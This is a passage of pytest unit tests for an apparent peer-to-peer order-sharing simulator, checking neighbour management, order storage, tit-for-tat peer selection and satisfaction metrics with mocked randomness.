This function tests calculate_density() with number out of range.
:return: None
"""
with pytest.raises(ValueError, match="Some input data is out of range."):
calculate_density([SATISFACTORY_LIST[4]], 0.1)
def test_calculate_density__invalid_division_unit() -> None:
"""
This function tests calculate_density() with invalid division unit.
:return: None
"""
with pytest.raises(ValueError, match="Invalid division unit."):
calculate_density([SATISFACTORY_LIST[0]], 2)
```
#### File: test/data_processing/test_find_best_worst_lists.py
```python
from typing import List, Tuple
import pytest
from data_processing import find_best_worst_lists
from data_types import BestAndWorstLists, InvalidInputError, SpreadingRatio
from .__init__ import RATIO_LIST
# test normal cases
CASES_BEST_WORST_LISTS: List[Tuple[List[SpreadingRatio], BestAndWorstLists]] = [
# tuples: (input, output)
(
[RATIO_LIST[0], RATIO_LIST[1], RATIO_LIST[2]],
BestAndWorstLists(best=RATIO_LIST[2], worst=RATIO_LIST[0]),
),
(
[RATIO_LIST[0], RATIO_LIST[1], RATIO_LIST[2], RATIO_LIST[3]],
BestAndWorstLists(best=RATIO_LIST[2], worst=RATIO_LIST[0]),
),
(
[RATIO_LIST[3], RATIO_LIST[4], RATIO_LIST[5]],
BestAndWorstLists(best=RATIO_LIST[4], worst=RATIO_LIST[4]),
),
(
[RATIO_LIST[4], RATIO_LIST[5], RATIO_LIST[6]],
BestAndWorstLists(best=RATIO_LIST[6], worst=RATIO_LIST[4]),
),
(
[RATIO_LIST[5], RATIO_LIST[7], RATIO_LIST[8]],
BestAndWorstLists(best=RATIO_LIST[5], worst=RATIO_LIST[8]),
),
(
[RATIO_LIST[3], RATIO_LIST[9], RATIO_LIST[10], RATIO_LIST[11]],
BestAndWorstLists(best=RATIO_LIST[10], worst=RATIO_LIST[11]),
),
(
[
RATIO_LIST[0],
RATIO_LIST[1],
RATIO_LIST[2],
RATIO_LIST[3],
RATIO_LIST[4],
RATIO_LIST[5],
RATIO_LIST[6],
RATIO_LIST[7],
RATIO_LIST[8],
RATIO_LIST[9],
RATIO_LIST[10],
],
BestAndWorstLists(best=RATIO_LIST[6], worst=RATIO_LIST[0]),
),
]
@pytest.mark.parametrize("ratio_list, expected_output", CASES_BEST_WORST_LISTS)
def test_find_best_worst_lists__normal(
ratio_list: List[SpreadingRatio], expected_output: BestAndWorstLists
) -> None:
"""
This function tests find_best_worst_lists in normal cases
:param ratio_list: list of SpreadingRatio instances
:param expected_output: an instance of BestAndWorstLists
:return: None
"""
actual_output: BestAndWorstLists = find_best_worst_lists(ratio_list)
for idx in range(2):
assert len(expected_output[idx]) == len(actual_output[idx])
for value_idx in range(len(expected_output)):
if isinstance(expected_output[idx][value_idx], float):
assert actual_output[idx][value_idx] == pytest.approx(
expected_output[idx][value_idx]
)
else: # this is a None
assert expected_output[idx][value_idx] is actual_output[idx][value_idx]
# test exceptions
def test_find_best_worst_lists__all_none() -> None:
"""
This function tests find_best_worst_lists when every element is None.
:return: None
"""
with pytest.raises(ValueError, match="All entries are None."):
find_best_worst_lists([RATIO_LIST[3], RATIO_LIST[12], RATIO_LIST[13]])
def test_find_best_worst_lists__empty_input() -> None:
"""
This function tests find_best_worst_lists when the input is empty.
:return: None
"""
with pytest.raises(InvalidInputError):
find_best_worst_lists([])
def test_find_best_worst_lists__different_length() -> None:
"""
This function tests find_best_worst_lists when the input length varies.
:return: None
"""
with pytest.raises(ValueError, match="Input lists are of different length."):
find_best_worst_lists([RATIO_LIST[0], RATIO_LIST[1], RATIO_LIST[14]])
```
#### File: test/engine/test_tit_for_tat.py
```python
import random
from typing import NamedTuple, Tuple, List
import pytest
import engine_candidates
from scenario import Scenario
from engine import Engine
from node import Peer
from ..__init__ import (
SCENARIO_SAMPLE,
ENGINE_SAMPLE,
create_test_peers,
create_a_test_peer,
)
def mock_random_sample(peers: List[Peer], number: int) -> List[Peer]:
"""
This is a mock function for random.sample(). In this module it is particularly used to select
some peer from a list of peers. In order to make it deterministic, in this mock
function we always return a list of peers with the smallest sequence numbers, and that the
size of the list equals "number".
"""
if number > len(peers):
raise ValueError("Not enough peers to choose from.")
list_of_peers = list(peers)
list_of_peers.sort(key=lambda x: x.seq)
return list_of_peers[:number]
class CaseType(NamedTuple):
"""
This is a date type defined for the test cases in this module.
The first six attributes are inputs to the test function, and the last two are expected outputs.
"""
scenario: Scenario # a scenario instance to create peers/orders
engine: Engine # an engine instance to create peers/orders
num_neighbors: int # number of neighbors that a peer has
mutual: int # mutual in tit-for-tat
optimistic: int # optimistic in tit-for-tat
time_now: int # time now
# expected number of neighbors selected as beneficiaries, by tit-for-tat
expected_length: int
# tuple containing sequence numbers of neighbor selected
expected_seqs: Tuple[int, ...]
# Case 1 represents that a peer is still a baby (age < baby_ending, in all tests we fix
# baby_ending = 10 and peer.birth_time = 0) so it will randomly choose (mutual + optimistic)
# neighbors from the set.
# Since we mocked the random.sample() function it will always choose the ones with the smallest
# sequence numbers.
CASE_1 = CaseType(
scenario=SCENARIO_SAMPLE,
engine=ENGINE_SAMPLE,
num_neighbors=10,
mutual=3,
optimistic=1,
time_now=0,
expected_length=4,
expected_seqs=(0, 1, 2, 3),
)
# In all following cases, peers are not babies any more (time_now = 100).
# In case 2, the total number of neighbors is so small (< mutual) so all neighbors will be selected.
CASE_2 = CaseType(
scenario=SCENARIO_SAMPLE,
engine=ENGINE_SAMPLE,
num_neighbors=3,
mutual=8,
optimistic=1,
time_now=100,
expected_length=3,
expected_seqs=(0, 1, 2),
)
# In case 3, the total number of neighbors is still small (> mutual but < mutual + optimistic),
# so all neighbors will be selected.
CASE_3 = CaseType(
scenario=SCENARIO_SAMPLE,
engine=ENGINE_SAMPLE,
num_neighbors=5,
mutual=3,
optimistic=5,
time_now=100,
expected_length=5,
expected_seqs=(0, 1, 2, 3, 4),
)
# Case 4 is a typical one. The total number of neighbors is large, so "mutual" number of highly
# scored peers will be selected (in this case, they are peer 497-499) and "optimistic" number of
# the rest will be randomly selected (in this case, they are peers 0-4).
CASE_4 = CaseType(
scenario=SCENARIO_SAMPLE,
engine=ENGINE_SAMPLE,
num_neighbors=500,
mutual=3,
optimistic=5,
time_now=100,
expected_length=8,
expected_seqs=(497, 498, 499, 0, 1, 2, 3, 4),
)
@pytest.mark.parametrize(
"scenario, engine, num_neighbors, mutual, optimistic, time_now, expected_length, expected_seqs",
[CASE_1, CASE_2, CASE_3, CASE_4],
)
def test_tit_for_tat__no_zero_contributors(
scenario: Scenario,
engine: Engine,
num_neighbors: int,
mutual: int,
optimistic: int,
time_now: int,
expected_length: int,
expected_seqs: Tuple[int, ...],
monkeypatch,
):
"""
Parameter explanation: please refer to CaseType data type definition.
This tests tit_for_tat() when all neighbors have a positive score.
"""
# Arrange
peer = create_a_test_peer(scenario, engine)[0]
peer.birth_time = 0
neighbor_peers = create_test_peers(scenario, engine, num_neighbors)
for i in range(num_neighbors):
neighbor_peers[i].seq = i
peer.add_neighbor(neighbor_peers[i])
neighbor_peers[i].add_neighbor(peer)
# make sure no one is having a score of zero
peer.peer_neighbor_mapping[neighbor_peers[i]].score = i + 300
monkeypatch.setattr(random, "sample", mock_random_sample)
# Act
selected_peer_set = engine_candidates.tit_for_tat(
baby_ending=10,
mutual=mutual,
optimistic=optimistic,
time_now=time_now,
time_start=peer.birth_time,
peer=peer,
)
# Assert
assert len(selected_peer_set) == expected_length
for peer in selected_peer_set:
assert peer.seq in expected_seqs
# The last test case is a bit different and we leave it alone.
# We would like to test of some peers have zero-contribution (score = 0).
# According to the implementation of tit-for-tat, only non-zero scored peers can be selected to
# the mutually-helping group (total number is "mutual"), but if there are not enough such peers,
# then this group of choice will only cover the qualified peers (score > 0) and we don't
# necessarily choose exactly "mutual" number of such peers, but we select up to all
# non-zero-scored peers. The quota in the "mutual" group can be wasted.
# For any peer which is not selected in the first group, they are put into the random choice
# group (will choose up to "optimistic" ones).
# In the following example, we have 5 peers whose score = 0, and 5 peers score > 0. Mutual = 7
# and optimistic = 3. However, we will only choose 5 mutually helping peers, and still select 3
# optimistic ones.
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_tit_for_tat__zero_contributors(scenario, engine, monkeypatch):
"""
This tests the most general case with a number of zero-contributors.
Zero-contributor can never be put into mutual helpers. But they can still be optimistically
chosen.
"""
peer = create_a_test_peer(scenario, engine)[0]
peer.birth_time = 0
neighbor_peers = create_test_peers(scenario, engine, 10)
for i in range(5):
neighbor_peers[i].seq = i
peer.add_neighbor(neighbor_peers[i])
neighbor_peers[i].add_neighbor(peer)
# making sure everyone is having a score of zero
peer.peer_neighbor_mapping[neighbor_peers[i]].score = 0
for i in range(5, 10):
neighbor_peers[i].seq = i
peer.add_neighbor(neighbor_peers[i])
neighbor_peers[i].add_neighbor(peer)
# making sure no one is having a score of zero
peer.peer_neighbor_mapping[neighbor_peers[i]].score = i + 300
monkeypatch.setattr(random, "sample", mock_random_sample)
# Act
selected_peer_set = engine_candidates.tit_for_tat(
baby_ending=10,
mutual=7,
optimistic=3,
time_now=100,
time_start=peer.birth_time,
peer=peer,
)
# Assert
assert len(selected_peer_set) == 8
for peer in selected_peer_set:
assert peer.seq in (5, 6, 7, 8, 9, 0, 1, 2)
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_tit_for_tat__baby_peer(scenario, engine, monkeypatch):
"""
This tests the most general case with a number of zero-contributors.
Zero-contributor can never be put into mutual helpers. But they can still be optimistically
chosen.
"""
peer = create_a_test_peer(scenario, engine)[0]
peer.birth_time = 0
neighbor_peers = create_test_peers(scenario, engine, 10)
for i in range(10):
neighbor_peers[i].seq = i
peer.add_neighbor(neighbor_peers[i])
neighbor_peers[i].add_neighbor(peer)
# making sure everyone is having a score of zero
peer.peer_neighbor_mapping[neighbor_peers[i]].score = 0
monkeypatch.setattr(random, "sample", mock_random_sample)
# Act
# Now this peer should be considered as a baby since time_now - time_start < baby_ending,
# although time_now - peer.birth_time > baby_ending
selected_peer_set = engine_candidates.tit_for_tat(
baby_ending=10, mutual=7, optimistic=3, time_now=20, time_start=19, peer=peer
)
# Assert. All should be selected. In comparison, if it is not a baby peer, only 3 will be
# selected.
assert len(selected_peer_set) == 10
```
#### File: test/node/test_del_neighbor.py
```python
from typing import List
import pytest
from message import Order
from node import Peer
from ..__init__ import (
create_a_test_peer,
SCENARIO_SAMPLE,
ENGINE_SAMPLE,
create_a_test_order,
create_test_peers,
)
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_del_neighbor_normal(scenario, engine) -> None:
"""
normal case.
"""
# Arrange.
peer_list: List[Peer] = create_test_peers(scenario, engine, 2)
peer_list[0].add_neighbor(peer_list[1])
peer_list[1].add_neighbor(peer_list[0])
# Act.
peer_list[0].del_neighbor(peer_list[1])
# Assert.
# The deletion should be normal. Both sides should delete the other one.
assert (
not peer_list[0].peer_neighbor_mapping
and not peer_list[1].peer_neighbor_mapping
)
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_del_neighbor__non_existing(scenario, engine) -> None:
"""
Delete non existing neighbor.
"""
# Arrange.
peer_list: List[Peer] = create_test_peers(scenario, engine, 2)
# Act and Assert.
# Delete an non-existing neighbor
with pytest.raises(
ValueError, match="This peer is not my neighbor. Unable to delete."
):
peer_list[0].del_neighbor(peer_list[1])
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_del_neighbor__self(scenario, engine) -> None:
"""
Delete itself from neighbor set.
"""
# Arrange
peer: Peer = create_a_test_peer(scenario, engine)[0]
# Act and Assert. Delete self.
with pytest.raises(
ValueError, match="This peer is not my neighbor. Unable to delete."
):
peer.del_neighbor(peer)
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_del_neighbor_with_remove_order__in_storage(scenario, engine) -> None:
"""
This tests when there is an order from the deleted neighbor in the local storage.
"""
# Arrange.
# create my_peer and a neighbor. Later, the neighbor will be deleted.
my_peer: Peer = create_a_test_peer(scenario, engine)[0]
neighbor: Peer = create_a_test_peer(scenario, engine)[0]
my_peer.add_neighbor(neighbor)
neighbor.add_neighbor(my_peer)
# we have a new order. Neighbor has it.
order: Order = create_a_test_order(scenario)
neighbor.receive_order_external(order)
# Manually set verification done
neighbor.send_orders_to_on_chain_check(neighbor.local_clock)
neighbor.store_orders()
# my_peer will have the order in local storage, from the neighbor
my_peer.receive_order_internal(neighbor, order)
# Manually set verification done
my_peer.send_orders_to_on_chain_check(my_peer.local_clock)
my_peer.store_orders()
# Act.
# my_peer deletes neighbor and cancels orders from it.
my_peer.del_neighbor(neighbor, remove_order=True)
# Assert.
# Now order should have been deleted from local storage.
assert order not in my_peer.order_orderinfo_mapping
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_del_neighbor_with_remove_order__single_pending_orderinfo(
scenario, engine
) -> None:
"""
This tests if there is a single orderinfo from the deleted neighbor in the pending table.
"""
# Arrange.
# create my_peer and a neighbor. Later, the neighbor will be deleted.
my_peer: Peer = create_a_test_peer(scenario, engine)[0]
neighbor: Peer = create_a_test_peer(scenario, engine)[0]
my_peer.add_neighbor(neighbor)
neighbor.add_neighbor(my_peer)
# we have a new order. Neighbor has it.
order: Order = create_a_test_order(scenario)
neighbor.receive_order_external(order)
# Manually set verification done
neighbor.send_orders_to_on_chain_check(neighbor.local_clock)
neighbor.store_orders()
# my_peer will have the order in the pending table, from the neighbor
my_peer.receive_order_internal(neighbor, order)
# Act.
# my_peer deletes neighbor and cancels orders from it.
my_peer.del_neighbor(neighbor, remove_order=True)
# Assert.
# Now order should have been deleted from local storage.
assert order not in my_peer.order_pending_orderinfo_mapping
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_del_neighbor_with_remove_order__multi_pending_orderinfo(
scenario, engine
) -> None:
"""
Test if there are multiple orderinfos, one from the deleted neighbor, in the pending table.
"""
# Arrange.
# create my_peer and neighbors. Later, neighbor_list[0] will be deleted.
my_peer: Peer = create_a_test_peer(scenario, engine)[0]
neighbor_list: List[Peer] = create_test_peers(scenario, engine, 2)
for neighbor in neighbor_list:
my_peer.add_neighbor(neighbor)
neighbor.add_neighbor(my_peer)
# new order.
order: Order = create_a_test_order(scenario)
for neighbor in neighbor_list:
neighbor.receive_order_external(order)
# Manually set verification done
neighbor.send_orders_to_on_chain_check(neighbor.local_clock)
neighbor.store_orders()
# my_peer also has order in pending table. It has versions from both neighbors.
for neighbor in neighbor_list:
my_peer.receive_order_internal(neighbor, order)
# Act.
# my_peer deletes neighbor 0 and cancels orders from it.
my_peer.del_neighbor(neighbor_list[0], remove_order=True)
# Assert.
# Now order should still be in the pending table, but the copy is not from neighbor[0]
assert len(my_peer.order_pending_orderinfo_mapping[order]) == 1
assert (
my_peer.order_pending_orderinfo_mapping[order][0].prev_owner == neighbor_list[1]
)
```
#### File: test/node/test_store_orders.py
```python
from typing import List
import pytest
from node import Peer
from message import Order, OrderInfo
from ..__init__ import (
create_a_test_order,
create_a_test_peer,
create_test_peers,
SCENARIO_SAMPLE,
ENGINE_SAMPLE,
)
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_store_orders__single_orderinfo(scenario, engine) -> None:
"""
This one tests the case where an order has a single orderinfo instance in the pending table
and later, it is put into local storage.
"""
# Arrange.
peer: Peer = create_a_test_peer(scenario, engine)[0]
order: Order = create_a_test_order(scenario)
peer.receive_order_external(order)
# Act.
peer.send_orders_to_on_chain_check(peer.local_clock)
peer.store_orders()
# Assert.
assert order in peer.order_orderinfo_mapping
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_store_orders__multi_orderinfo(scenario, engine, monkeypatch) -> None:
"""
This one tests the case where an order has multiple orderinfo instances in the pending table
and later, one of them is put into local storage.
"""
# Arrange.
# Create a peer and a neighbors for this peer. They will be connected.
peer: Peer = create_a_test_peer(scenario, engine)[0]
neighbor_list: List[Peer] = create_test_peers(scenario, engine, 2)
# create an order
order: Order = create_a_test_order(scenario)
# neighbors store this order and are connected to peer.
for neighbor in neighbor_list:
neighbor.add_neighbor(peer)
peer.add_neighbor(neighbor)
neighbor.receive_order_external(order)
neighbor.send_orders_to_on_chain_check(neighbor.local_clock)
neighbor.store_orders()
# since receive_order_internal() function has not been tested, we manually put the order
# into peer's pending table
for neighbor in neighbor_list:
orderinfo = OrderInfo(
engine=engine,
order=order,
master=neighbor,
arrival_time=peer.birth_time,
priority=None,
prev_owner=neighbor,
novelty=0,
)
if order not in peer.order_pending_orderinfo_mapping:
peer.order_pending_orderinfo_mapping[order] = [orderinfo]
peer.verification_time_orders_mapping[0].append(order)
else:
peer.order_pending_orderinfo_mapping[order].append(orderinfo)
order.hesitators.add(peer)
# manually set storage_decisions for the order.
# Store neighbor_0's orderinfo instance for the order.
for orderinfo in peer.order_pending_orderinfo_mapping[order]:
if orderinfo.prev_owner == neighbor_list[0]:
orderinfo.storage_decision = True
else:
orderinfo.storage_decision = False
# Disable engine.store_or_discard_orders which will otherwise
# change the values for orderinfo.storage_decision
def fake_storage_decision(_node):
pass
monkeypatch.setattr(engine, "store_or_discard_orders", fake_storage_decision)
peer.send_orders_to_on_chain_check(peer.local_clock)
# Act.
peer.store_orders()
# Assert.
# order should have been stored and it is the right version.
assert peer.order_orderinfo_mapping[order].prev_owner == neighbor_list[0]
# peer's pending table should have been cleared.
assert peer.order_pending_orderinfo_mapping == {}
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_store_orders__do_not_store(scenario, engine, monkeypatch) -> None:
"""
This one tests the case where an order has orderinfo instance(s) in the pending
table but later, it is not stored since labeled as not to store.
"""
# Arrange.
# Create a peer and a neighbors for this peer. They will be connected.
peer: Peer = create_a_test_peer(scenario, engine)[0]
neighbor_list: List[Peer] = create_test_peers(scenario, engine, 2)
# create an order
order: Order = create_a_test_order(scenario)
# neighbors store this order and are connected to peer.
for neighbor in neighbor_list:
neighbor.add_neighbor(peer)
peer.add_neighbor(neighbor)
neighbor.receive_order_external(order)
neighbor.send_orders_to_on_chain_check(neighbor.local_clock)
neighbor.store_orders()
# since receive_order_internal() function has not been tested, we manually put the order
# into peer's pending table
for neighbor in neighbor_list:
orderinfo = OrderInfo(
engine=engine,
order=order,
master=neighbor,
arrival_time=peer.birth_time,
priority=None,
prev_owner=neighbor,
novelty=0,
)
if order not in peer.order_pending_orderinfo_mapping:
peer.order_pending_orderinfo_mapping[order] = [orderinfo]
peer.verification_time_orders_mapping[0].append(order)
else:
peer.order_pending_orderinfo_mapping[order].append(orderinfo)
order.hesitators.add(peer)
# manually set storage_decisions for the order. All are False.
for orderinfo in peer.order_pending_orderinfo_mapping[order]:
orderinfo.storage_decision = False
# Disable engine.store_or_discard_orders which will otherwise
# change the values for orderinfo.storage_decision
def fake_storage_decision(_node):
pass
monkeypatch.setattr(engine, "store_or_discard_orders", fake_storage_decision)
peer.send_orders_to_on_chain_check(peer.local_clock)
# Act.
peer.store_orders()
# Assert.
# order should have been stored and it is the right version.
assert order not in peer.order_orderinfo_mapping
# peer's pending table should have been cleared.
assert peer.order_pending_orderinfo_mapping == {}
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_store_orders__sender_disconnected(scenario, engine, monkeypatch) -> None:
"""
This function tests the case of storing an order from some peer recently disconnected
(it was a neighbor when sending this order to the peer).
"""
# Arrange.
# Create a peer and a neighbor for this peer.
peer: Peer = create_a_test_peer(scenario, engine)[0]
neighbor: Peer = create_a_test_peer(scenario, engine)[0]
neighbor.add_neighbor(peer)
peer.add_neighbor(neighbor)
# create an order and the neighbor has this order.
order: Order = create_a_test_order(scenario)
neighbor.receive_order_external(order)
neighbor.send_orders_to_on_chain_check(neighbor.local_clock)
neighbor.store_orders()
# We manually put the order into peer's pending table
orderinfo = OrderInfo(
engine=engine,
order=order,
master=neighbor,
arrival_time=peer.birth_time,
priority=None,
prev_owner=neighbor,
novelty=0,
)
peer.order_pending_orderinfo_mapping[order] = [orderinfo]
peer.verification_time_orders_mapping[0].append(order)
order.hesitators.add(peer)
# manually set storage_decisions for the order.
orderinfo.storage_decision = True
# now let us disconnect neighbor_disconnect
peer.del_neighbor(neighbor)
# Disable engine.store_or_discard_orders which will otherwise
# change the values for orderinfo.storage_decision
def fake_storage_decision(_node):
pass
monkeypatch.setattr(engine, "store_or_discard_orders", fake_storage_decision)
peer.send_orders_to_on_chain_check(peer.local_clock)
# Act.
peer.store_orders()
# Assert.
# order should have been stored, though the neighbor left.
assert peer.order_orderinfo_mapping[order].prev_owner == neighbor
# check peer's pending table. It should have been cleared.
assert peer.order_pending_orderinfo_mapping == {}
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_store_orders__multi_orderinfo_error(scenario, engine, monkeypatch) -> None:
"""
This function tests if an order has multiple orderinfo instances and more than one is
labeled as to store. In such case an error is expected.
"""
# Arrange.
# Create a peer and two neighbors for this peer.
peer: Peer = create_a_test_peer(scenario, engine)[0]
neighbor_list: List[Peer] = create_test_peers(scenario, engine, 2)
# order will have multiple orderinfo instances to store and raise an error
order: Order = create_a_test_order(scenario)
for neighbor in neighbor_list:
# each neighbor receives the orders and becomes the neighbor of the peer.
neighbor.receive_order_external(order)
neighbor.send_orders_to_on_chain_check(neighbor.local_clock)
neighbor.store_orders()
neighbor.add_neighbor(peer)
peer.add_neighbor(neighbor)
# since receive_order_internal() function has not been tested, we manually put the order
# into peer's pending table
for neighbor in neighbor_list:
orderinfo = OrderInfo(
engine=engine,
order=order,
master=neighbor,
arrival_time=peer.birth_time,
priority=None,
prev_owner=neighbor,
novelty=0,
)
if order not in peer.order_pending_orderinfo_mapping:
peer.order_pending_orderinfo_mapping[order] = [orderinfo]
peer.verification_time_orders_mapping[0].append(order)
else:
peer.order_pending_orderinfo_mapping[order].append(orderinfo)
order.hesitators.add(peer)
# manually set storage_decisions for each order as True
for orderinfo in peer.order_pending_orderinfo_mapping[order]:
orderinfo.storage_decision = True
# Disable engine.store_or_discard_orders which will otherwise
# change the values for orderinfo.storage_decision
def fake_storage_decision(_node):
pass
monkeypatch.setattr(engine, "store_or_discard_orders", fake_storage_decision)
peer.send_orders_to_on_chain_check(peer.local_clock)
# Act and Assert.
with pytest.raises(
ValueError, match="Should not store multiple copies of same order."
):
peer.store_orders()
```
#### File: test/performance_candidates/test_single_peer_satisfaction_neutral.py
```python
import copy
from typing import List, NamedTuple
import pytest
from scenario import Scenario
from engine import Engine
import performance_candidates
from ..__init__ import SCENARIO_SAMPLE, ENGINE_SAMPLE
# The arrange helper function needed in this module is exactly the same as in
# test_single_peer_order_receipt_ratio.py so we import it.
# We will be using the same CASE_3 as in test_single_peer_order_receipt_ratio.py so we import it.
from .test_single_peer_order_receipt_ratio import arrange_for_test, CASE_3
class CaseType(NamedTuple):
"""
Data type for test cases in this module. All elements are the same as CaseType in
test_single_peer_order_receipt_ratio.py except the last one.
"""
scenario: Scenario
engine: Engine
num_order: int
order_birth_time_list: List[int]
order_id_owned_by_peer: List[int]
order_id_in_stat: List[int]
max_age: int
window: int
expected_result: float # expected satisfaction result.
# Case 1 is very similar to case 1 in test_single_peer_order_receipt_ratio.py.
# Expected result is the average of non-None elements in expected_result in case 1 in
# test_single_peer_order_receipt_ratio.py
CASE_1 = CaseType(
scenario=SCENARIO_SAMPLE,
engine=ENGINE_SAMPLE,
num_order=11,
order_birth_time_list=[100, 100, 99, 70, 60, 55, 55, 12, 6, 1, 0],
order_id_owned_by_peer=[0, 1, 3, 7, 9, 10],
order_id_in_stat=[0, 2, 3, 4, 5, 6, 7, 8, 10],
max_age=100,
window=10,
expected_result=0.5,
)
# Case 2 is very similar to case 2 in test_single_peer_order_receipt_ratio.py.
# Expected result is the average of non-None elements in expected_result in case 2 in
# test_single_peer_order_receipt_ratio.py
CASE_2 = CaseType(
scenario=SCENARIO_SAMPLE,
engine=ENGINE_SAMPLE,
num_order=11,
order_birth_time_list=[100, 100, 99, 70, 60, 55, 55, 12, 6, 1, 0],
order_id_owned_by_peer=[0, 1, 3, 7, 9, 10],
order_id_in_stat=[0, 2, 3, 4, 5, 6, 7, 8, 10],
max_age=101,
window=10,
expected_result=3.5 / 6,
)
@pytest.mark.parametrize(
"scenario, engine, num_order, order_birth_time_list, order_id_owned_by_peer, "
"order_id_in_stat, max_age, window, expected_result",
[CASE_1, CASE_2],
)
def test_single_peer_satisfaction_neutral__normal(
scenario: Scenario,
engine: Engine,
num_order: int,
order_birth_time_list: List[int], # all birth times are normal
order_id_owned_by_peer: List[int],
order_id_in_stat: List[int],
max_age: int,
window: int,
expected_result: float,
):
"""
This function tests normal cases.
"""
# Arrange
peer, order_set = arrange_for_test(
scenario,
engine,
num_order,
order_birth_time_list,
order_id_owned_by_peer,
order_id_in_stat,
)
# Act
satisfaction = performance_candidates.single_peer_satisfaction_neutral(
cur_time=100,
peer=peer,
max_age_to_track=max_age,
statistical_window=window,
order_set=order_set,
)
# Assert.
assert satisfaction == expected_result
# Case 3 is the same as case 3 in test_single_peer_order_receipt_ratio.py. Some error expected.
@pytest.mark.parametrize(
"scenario, engine, num_order, order_birth_time_list_abnormal, order_id_owned_by_peer, "
"order_id_in_stat, max_age, window, _expected_result",
[CASE_3],
)
def test_single_peer_satisfaction_neutral__negative_age(
scenario: Scenario,
engine: Engine,
num_order: int,
# one birth time will be abnormal (> cur_time)
order_birth_time_list_abnormal: List[int],
order_id_owned_by_peer: List[int],
order_id_in_stat: List[int],
max_age: int,
window: int,
_expected_result: float,
):
"""
This function tests negative order age.
"""
# Arrange
peer, order_set = arrange_for_test(
scenario,
engine,
num_order,
order_birth_time_list_abnormal,
order_id_owned_by_peer,
order_id_in_stat,
)
# Act and Asset.
with pytest.raises(ValueError, match="Some order age is negative."):
performance_candidates.single_peer_satisfaction_neutral(
cur_time=100,
peer=peer,
max_age_to_track=max_age,
statistical_window=window,
order_set=order_set,
)
# Case 4 contains no order for statistics. Error expected.
CASE_4 = copy.deepcopy(CASE_2)
CASE_4.order_id_in_stat.clear()
@pytest.mark.parametrize(
"scenario, engine, num_order, order_birth_time_list, order_id_owned_by_peer, "
"order_id_in_stat_empty, max_age, window, _expected_result",
[CASE_4],
)
def test_single_peer_satisfaction_neutral__no_order(
scenario: Scenario,
engine: Engine,
num_order: int,
order_birth_time_list: List[int],
order_id_owned_by_peer: List[int],
order_id_in_stat_empty: List[int], # This will be empty
max_age: int,
window: int,
_expected_result: float,
):
"""
This function tests non-existence of orders.
"""
# Arrange
peer, order_set = arrange_for_test(
scenario,
engine,
num_order,
order_birth_time_list,
order_id_owned_by_peer,
order_id_in_stat_empty,
)
# Act and Asset.
with pytest.raises(
RuntimeError, match="Unable to judge a single peer satisfaction"
):
performance_candidates.single_peer_satisfaction_neutral(
cur_time=100,
peer=peer,
max_age_to_track=max_age,
statistical_window=window,
order_set=order_set,
)
```
#### File: test/single_and_multi_run/test_add_new_links_helper.py
```python
from typing import List, Tuple
import pytest
from single_run import SingleRun
from node import Peer
from scenario import Scenario
from engine import Engine
from performance import Performance
from ..__init__ import SCENARIO_SAMPLE, ENGINE_SAMPLE, PERFORMANCE_SAMPLE
@pytest.fixture(autouse=True)
def temporary_change_of_neighbor_size(engine):
"""
This function is to temporarily change the expected neighborhood size for the test functions
to use in this module.
It is set to autouse so all functions in this module will call it.
"""
# Setup
original_neighbor_max = engine.neighbor_max
original_neighbor_min = engine.neighbor_min
engine.neighbor_max = 6
engine.neighbor_min = 3
yield
# Tear down
engine.neighbor_max = original_neighbor_max
engine.neighbor_min = original_neighbor_min
# Define some constants for use in this module.
NUM_FULLY_CONNECTED_PEERS = 7 # 7 peers are fully connected
TOTAL_NUM_OF_PEERS = 12 # total number of peers is 12
def create_single_run_instance_and_peers(
scenario: Scenario, engine: Engine, performance: Performance
) -> Tuple[SingleRun, List[Peer]]:
"""
This helper function sets up a single_run instance with 12 peers, among which the first 7
peers are connected with each other. It returns the single_run instance and the 12 peers.
"""
# Create the single_run instance
this_instance = SingleRun(scenario, engine, performance)
# Create 12 peers in this single_run
for _ in range(TOTAL_NUM_OF_PEERS):
this_instance.peer_arrival("normal", {})
# Record these peers
the_peer_list: List[Peer] = list()
iterator = iter(this_instance.peer_full_set)
for _ in range(TOTAL_NUM_OF_PEERS):
the_peer_list.append(next(iterator))
# For the first 7 peers, they form a full mesh.
for any_peer in the_peer_list[0:NUM_FULLY_CONNECTED_PEERS]:
for other_peer in the_peer_list[0:NUM_FULLY_CONNECTED_PEERS]:
if (
any_peer is not other_peer
and any_peer not in other_peer.peer_neighbor_mapping
):
any_peer.add_neighbor(other_peer)
other_peer.add_neighbor(any_peer)
return this_instance, the_peer_list
@pytest.mark.parametrize(
"scenario, engine, performance",
[(SCENARIO_SAMPLE, ENGINE_SAMPLE, PERFORMANCE_SAMPLE)],
)
def test_add_new_links_helper__normal(
scenario: Scenario, engine: Engine, performance: Performance
) -> None:
"""
This function tests add_new_links_helper() in a normal case.
"""
# Arrange
# Create the single_run instance and peers
single_run_instance, peer_list = create_single_run_instance_and_peers(
scenario, engine, performance
)
# Act.
# Now, let peer_list[7] try to add 3 neighbors, or at least 1.
min_neighbor = 1
max_neighbor = 3
single_run_instance.add_new_links_helper(
peer_list[NUM_FULLY_CONNECTED_PEERS], max_neighbor, min_neighbor
)
# Assert.
assert (
min_neighbor
<= len(peer_list[NUM_FULLY_CONNECTED_PEERS].peer_neighbor_mapping)
<= max_neighbor
)
